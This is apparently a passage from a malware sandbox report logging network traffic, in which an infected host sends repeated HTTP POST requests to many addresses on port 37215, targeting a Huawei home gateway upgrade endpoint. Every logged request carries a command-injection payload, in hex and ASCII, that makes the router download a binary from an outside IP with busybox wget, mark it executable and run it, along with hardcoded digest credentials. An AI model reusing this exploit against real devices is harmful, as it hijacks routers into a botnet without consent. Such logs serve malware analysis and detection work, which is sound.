2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            418192.168.2.1550010197.5.72.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783186913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            419192.168.2.1544384197.159.48.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783186913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            420192.168.2.1552398197.128.223.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783196926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            421192.168.2.1549062197.61.176.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783230066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            422192.168.2.1543822197.108.189.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783241987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            423192.168.2.1539452197.252.93.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783268929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            424192.168.2.1541272197.25.62.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783293009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            425192.168.2.1533248197.194.32.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783346891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            426192.168.2.1534558197.223.143.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783375025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            427192.168.2.1543406197.210.129.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783375025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            428192.168.2.1535118197.229.146.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783401966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
